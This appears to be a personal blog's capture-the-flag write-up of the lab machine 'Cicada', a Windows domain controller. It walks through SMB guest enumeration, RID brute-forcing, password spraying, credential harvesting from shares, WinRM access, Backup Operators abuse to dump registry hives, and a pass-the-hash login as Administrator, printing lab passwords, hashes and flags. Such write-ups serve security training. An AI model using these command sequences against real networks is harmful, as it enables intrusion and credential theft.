Cicada

REHAN SAYYEDREHAN SAYYED
5 min read

IP: 10.129.64.6

Let’s start with the nmap scan.

nmap -sC -sV -o nmap 10.129.64.6
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-15 11:12 IST
Nmap scan report for 10.129.64.6
Host is up (0.17s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-05-15 12:43:00Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-05-15T12:43:42
|_  start_date: N/A
|_clock-skew: 6h59m59s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 102.95 seconds

We have a lot of interesting ports open from which we can likely assume it’s a Windows domain controller.

Also, we can see cicada.htb it being mentioned many times, so let’s first add it to our hosts file.

sudo nano /etc/hosts

As SMB supports more guest authentication so let’s start with enumerating shares.

nxc smb 10.129.64.6 --shares

We get an error that the user session is deleted, so let’s specify a non-existing user with an empty password and see if guest authentication is allowed on it or not.

nxc smb 10.129.64.6 -u "dignitas" -p "" --shares

We have two new shares DEV and HR and we also have READ access on HR share.

smbclient -U 'dignitas' //10.129.64.6/HR

So, we have a Notice from HR file, let’s get that to our machine and see the contents of it.

mget *.txt

cat Notice\ from\ HR.txt

We’ve been provided with a default password here Cicada$M6Corpb*@Lp#nZp!8 But we’re unaware of the users.

As we have guest authentication, we can do RID brute-forcing to bruteforce the user id’s from 0-4000.

nxc smb 10.129.64.6 -u "dignitas" -p "" --rid-brute

We got some users, so let’s add that to our list and then start with the password spray.

nxc smb 10.129.64.6 -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8'

The password is valid for michael.wrightson. Let’s enumerate and see if this user has access to DEV share.

nxc smb 10.129.64.6 -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' --shares

Michael doesn’t have any additional share access beyond what the guest user has. Now with LDAP access, we can look for a more complete list of users.

nxc smb 10.129.64.6 -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' --users

We have 8 local users, but the interesting thing is that the user david.orelious has a comment that spills his password aRt$Lp#7t*VQ!3

Let’s now check the access to the DEV Share again.

nxc smb 10.129.64.6 -u david.orelious -p 'aRt$Lp#7t*VQ!3' --shares

Let’s look at the contents inside the DEV share.

smbclient -U 'cicada/david.orelious%aRt$Lp#7t*VQ!3' //10.129.64.6/DEV

We have a file name Backup_script.ps1. Let’s download it to our machine and see what we have in there.

mget *.ps1

cat Backup_script.ps1

So, we have the password for emily.oscars i.e. Q!3@Lp#M6b*7t*Vt. Let’s see if the creds are valid for WinRM.

nxc winrm 10.129.64.6 -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt'

Let’s now connect using evil-winrm.

evil-winrm -i 10.129.64.6 -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt'

Let’s now get our first flag.

type C:\Users\emily.oscars.CICADA\Desktop\user.txt

Flag: 2b8a749011d596957ba7c3159c1ea4a5

Let’s now move to the root. Checking the privileges of Emily user.

net user emily.oscars

Emily is a member of Backup Operators group.

According to Microsoft docs,this group:

Members of the Backup Operators group can back up and restore all files on a computer, regardless of the permissions that protect those files. Backup Operators also can log on to and shut down the computer. This group can’t be renamed, deleted, or removed. By default, this built-in group has no members, and it can perform backup and restore operations on domain controllers. Members of the following groups can modify Backup Operators group membership: default service Administrators, Domain Admins in the domain, and Enterprise Admins. Members of the Backup Operators group can’t modify the membership of any administrative groups. Although members of this group can’t change server settings or modify the configuration of the directory, they do have the permissions needed to replace files (including operating system files) on domain controllers. Because members of this group can replace files on domain controllers, they’re considered service administrators.

This shows up in the form of the SeBackupPrivilege and SeRestorePrivilege

whoami /priv

Let’s now dump the registry hives to files and exfiltrate them.

reg save hklm\sam sam
reg save hklm\system system
reg save hklm\security security

download sam
download system

Let’s now dump the hashes.

impacket-secretsdump -sam sam -system system LOCAL

We got the Administrator hash, let’s use that to log in.

evil-winrm -i 10.129.64.6 -u administrator -H 2b87e7c93a3e8a0ea4a581937016f341

Let’s get our root flag now.

type C:\Users\Administrator\Desktop\root.txt

Flag: 8f272a073990777e7c9a3798de37b2d3

0
Subscribe to my newsletter

Read articles from REHAN SAYYED directly inside your inbox. Subscribe to the newsletter, and don't miss out.

Written by

REHAN SAYYED
REHAN SAYYED

Passionate cybersecurity enthusiast and red teamer, exploring the depths of offensive security. From secure code reviews to red team operations, I share insights, strategies, and hands-on experiences to help others dive into the world of cyber offense. Join me as I navigate the complexities of cybersecurity on my journey to professional red teaming.